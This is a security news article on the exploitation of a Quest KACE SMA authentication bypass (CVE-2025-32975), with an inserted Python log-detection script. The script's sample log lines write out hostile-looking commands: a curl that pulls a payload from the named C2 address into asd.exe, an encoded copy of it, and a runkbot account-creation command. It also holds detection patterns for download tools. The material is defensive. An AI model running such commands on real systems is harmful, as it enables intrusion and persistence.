According to new research, attackers are actively exploiting a serious flaw in Quest KACE Systems Management Appliance (SMA) to gain unauthorized access to systems, steal credentials, and move laterally across corporate networks. The flaw, tracked as CVE-2025-32975, affects the appliance's Single Sign-On (SSO) authentication and lets attackers bypass authentication altogether.

This lets attackers impersonate legitimate users without holding valid credentials, giving them full administrative control over vulnerable systems. Many businesses use Quest KACE SMA to manage all of their endpoints from one place, including software deployment, patching, and device monitoring. Because it is so deeply integrated into business environments, it is an attractive target. A patch for the flaw was released in May 2025, but many businesses have not yet updated their systems.

As a result, unpatched, internet-facing appliances are now being actively targeted in the wild. Researchers observed exploitation activity beginning the week of March 9, 2026. Arctic Wolf's security researchers found that once attackers get in through the authentication bypass, they quickly establish a foothold in the compromised environment.

They use the built-in KPluginRunProcess feature to run commands on other computers, often with Base64-encoded payloads to evade detection. In the observed attacks, threat actors used simple curl commands to fetch additional malicious payloads from an external command-and-control server at the IP address 216.126.225.156, a simple but effective way to stage further intrusion. To maintain persistence, attackers abuse legitimate system processes such as runkbot.exe to create unauthorized administrative accounts.

These rogue accounts are then added to local and domain administrator groups, ensuring continued access even if the original entry point is discovered. The attackers also use stealthy PowerShell scripts, such as Enable-UpdateServices.ps1 and taskband.ps1, to modify registry settings and set up long-term backdoor access. These changes let the malicious access survive reboots and routine maintenance.

Once persistence is secured, the next step is credential harvesting and internal reconnaissance. Attackers use Mimikatz, sometimes disguised as an innocuous executable such as asd.exe, to extract plaintext credentials directly from system memory. They use these credentials to identify high-value targets and map the network environment.
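As an added illustration that is not part of the article or of Arctic Wolf's report, the following Python sketch applies the indicators named above to constructed log lines: it decodes Base64 tokens before matching, so an encoded curl to the C2 address is caught the same way as a plaintext one. The log format, the `net user ... /add` pattern used to spot account creation via runkbot.exe, and the UTF-16-LE encoding of PowerShell's -EncodedCommand are assumptions.

```python
import base64
import re

# Indicators quoted in the article (Arctic Wolf's observations); the attackers'
# file names may differ in other intrusions. The regexes are my own heuristics.
C2_IP = "216.126.225.156"
SUSPECT_FILES = ("asd.exe", "enable-updateservices.ps1", "taskband.ps1")
ACCOUNT_TOOL = "runkbot.exe"
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")
ACCOUNT_CREATE = re.compile(r"\bnet1?\s+(user|localgroup)\b.*?/add", re.I)
DOWNLOAD_HINT = re.compile(r"\b(curl|wget|invoke-webrequest|iwr)\b|https?://", re.I)

def decode_b64(token):
    try:
        raw = base64.b64decode(token, validate=True)
        # PowerShell -EncodedCommand is UTF-16-LE, so ASCII text has a NUL in every 2nd byte
        return raw.decode("utf-16-le" if raw[1:2] == b"\x00" else "utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None

def classify(line):
    decoded = [d for d in map(decode_b64, B64_TOKEN.findall(line)) if d]
    text = "\n".join([line] + decoded)  # match against the line plus anything it encodes
    low = text.lower()
    hits = []
    if C2_IP in text:
        hits.append("c2_ip")
    if any(name in low for name in SUSPECT_FILES):
        hits.append("known_filename")
    if ACCOUNT_TOOL in low and ACCOUNT_CREATE.search(text):
        hits.append("account_creation_via_runkbot")
    if decoded and DOWNLOAD_HINT.search("\n".join(decoded)):
        hits.append("encoded_download")
    return hits

def scan_logs(lines):  # (1-based line number, matched rules) for every flagged line
    return [(i, h) for i, h in ((i, classify(l)) for i, l in enumerate(lines, 1)) if h]

# Encode a command the way PowerShell's -EncodedCommand expects it (assumption).
ps_encode = lambda cmd: base64.b64encode(cmd.encode("utf-16-le")).decode()

# Constructed sample lines in a made-up format; not real KACE SMA log output.
SAMPLE_LOGS = [
    r"KPluginRunProcess host=WS-17 cmd=curl http://216.126.225.156/stage2 -o C:\Windows\Temp\asd.exe",
    "KPluginRunProcess host=WS-17 cmd=powershell -enc " + ps_encode(r"curl http://216.126.225.156/stage2 -o C:\Windows\Temp\asd.exe"),
    "KPluginRunProcess host=WS-17 cmd=runkbot.exe net user svc_backup Pa55w0rd /add",
    "KPluginRunProcess host=WS-18 cmd=powershell -enc " + ps_encode("Get-Date; Get-Service"),
    "KPluginRunProcess host=WS-18 cmd=ipconfig /all",
]
```

Running `scan_logs(SAMPLE_LOGS)` flags the first three lines only; the benign encoded command on line 4 decodes cleanly but matches no rule.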

Researchers observed lateral movement over Remote Desktop Protocol (RDP), which gave attackers access to critical systems such as domain controllers and enterprise backup systems, including those running Veeam and Veritas software. This level of access greatly raises the risk of a large-scale breach, data theft, or ransomware deployment. Security experts strongly recommend patching affected systems immediately.

If you are running an older version, such as 13.0, 13.1, or 13.2, update to version 13.0.385, 13.1.81, or 13.2.183 or later, respectively. For newer deployments, version 14.0 needs Patch 5 (14.0.341) and version 14.1 needs Patch 4 (14.1.101). Beyond patching, organizations should keep KACE SMA interfaces off the public internet. Restricting access through a VPN or other secure network boundary greatly reduces the attack surface and prevents unauthorized use.

The ongoing campaign shows how dangerous unpatched systems are and how quickly attackers can turn known vulnerabilities into access to business networks.